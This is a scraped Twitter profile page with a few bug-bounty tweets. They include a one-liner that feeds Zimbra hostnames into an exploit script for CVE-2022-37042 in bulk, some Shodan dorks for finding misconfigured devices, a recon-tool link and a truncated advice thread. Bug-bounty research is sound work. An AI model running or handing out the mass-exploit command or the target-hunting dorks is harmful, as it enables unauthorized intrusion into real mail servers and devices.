Ahmed lotfy (@ahmed846737825) 's Twitter Profile
Ahmed lotfy

@ahmed846737825

ID: 1521390032032043008

calendar_today03-05-2022 07:24:10

23 Tweet

64 Followers

1,1K Following

πŸ‘‘ OFJAAAH πŸ‘‘ (@ofjaaah) 's Twitter Profile Photo

cat zimbra.json | jq -r '.hostnames[]' | httpx -silent | xargs -I@ sh -c 'python3 zimbra-exploit.py @ 313.zip' | egrep -v '404|401|405|200' #bugbounty #CVEZIMBRA #CVE-2022-37042

cat zimbra.json | jq -r '.hostnames[]' | httpx -silent | xargs -I@ sh -c 'python3 zimbra-exploit.py @ 313.zip' | egrep -v '404|401|405|200'

#bugbounty #CVEZIMBRA #CVE-2022-37042
Clandestine (@akaclandestine) 's Twitter Profile Photo

GitHub - Viralmaniar/BigBountyRecon: BigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. github.com/Viralmaniar/Bi…

Pratik Dabhi (@impratikdabhi) 's Twitter Profile Photo

Here are some Shodan dorks that bug bounty hunters can use to discover potentially vulnerable or misconfigured devices: 1. Apache Default Page: apache country:"YOUR_COUNTRY_CODE" title:"Index of /" -"Forbidden" 2. Default Login Pages: "login:" "password"

Jayesh Madnani (@jayesh25_) 's Twitter Profile Photo

I’ve noticed that most new folks who reach out for guidance in bug bounty feel overwhelmed early on trying to learn everything at once. That often leads to half-baked knowledge across multiple areas and slower overall progress. Here's what I recommend instead πŸ‘‡ 1/ Pick one